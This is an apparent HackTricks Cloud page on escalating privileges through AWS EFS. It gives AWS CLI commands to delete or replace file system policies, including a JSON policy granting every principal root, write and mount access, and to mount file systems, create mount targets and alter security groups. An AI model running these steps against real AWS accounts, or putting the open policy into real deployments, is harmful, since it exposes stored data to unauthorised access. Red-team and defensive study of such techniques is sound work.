AWS - EFS Privesc

Learn & practice AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE) Learn & practice GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE)

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

EFS

More info about EFS in:

AWS - EFS Enum

Remember that in order to mount an EFS you need to be in a subnetwork where the EFS is exposed and have access to it (security groups). Is this is happening, by default, you will always be able to mount it, however, if it's protected by IAM policies you need to have the extra permissions mentioned here to access it.

`elasticfilesystem:DeleteFileSystemPolicy`|`elasticfilesystem:PutFileSystemPolicy`

With any of those permissions an attacker can change the file system policy to give you access to it, or to just delete it so the default access is granted.

To delete the policy:

aws efs delete-file-system-policy \
    --file-system-id <value>

To change it:

aws efs put-file-system-policy --file-system-id <fs-id> --policy file:///tmp/policy.json

// Give everyone trying to mount it read, write and root access
// policy.json: 
{
    "Version": "2012-10-17",
    "Id": "efs-policy-wizard-059944c6-35e7-4ba0-8e40-6f05302d5763",
    "Statement": [
        {
            "Sid": "efs-statement-2161b2bd-7c59-49d7-9fee-6ea8903e6603",
            "Effect": "Allow",
            "Principal": {
                "AWS": "*"
            },
            "Action": [
	       "elasticfilesystem:ClientRootAccess",
               "elasticfilesystem:ClientWrite",
               "elasticfilesystem:ClientMount"
            ],
            "Condition": {
                "Bool": {
                    "elasticfilesystem:AccessedViaMountTarget": "true"
                }
            }
        }
    ]
}

`elasticfilesystem:ClientMount|(elasticfilesystem:ClientRootAccess)|(elasticfilesystem:ClientWrite)`

With this permission an attacker will be able to mount the EFS. If the write permission is not given by default to everyone that can mount the EFS, he will have only read access.

sudo mkdir /efs
sudo mount -t efs -o tls,iam  <file-system-id/EFS DNS name>:/ /efs/

The extra permissionselasticfilesystem:ClientRootAccess and elasticfilesystem:ClientWrite can be used to write inside the filesystem after it's mounted and to access that file system as root.

Potential Impact: Indirect privesc by locating sensitive information in the file system.

`elasticfilesystem:CreateMountTarget`

If you an attacker is inside a subnetwork where no mount target of the EFS exists. He could just create one in his subnet with this privilege:

# You need to indicate security groups that will grant the user access to port 2049
aws efs create-mount-target --file-system-id <fs-id> \
    --subnet-id <value> \
    --security-groups <value>

Potential Impact: Indirect privesc by locating sensitive information in the file system.

`elasticfilesystem:ModifyMountTargetSecurityGroups`

In a scenario where an attacker finds that the EFS has mount target in his subnetwork but no security group is allowing the traffic, he could just change that modifying the selected security groups:

aws efs modify-mount-target-security-groups \
    --mount-target-id <value> \
    --security-groups <value>

Potential Impact: Indirect privesc by locating sensitive information in the file system.

Support HackTricks

Check the subscription plans!
Join the 💬 Discord group or the telegram group or follow us on Twitter 🐦 @hacktricks_live.
Share hacking tricks by submitting PRs to the HackTricks and HackTricks Cloud github repos.

PreviousAWS - ECS Privesc NextAWS - Elastic Beanstalk Privesc

Last updated 4 months ago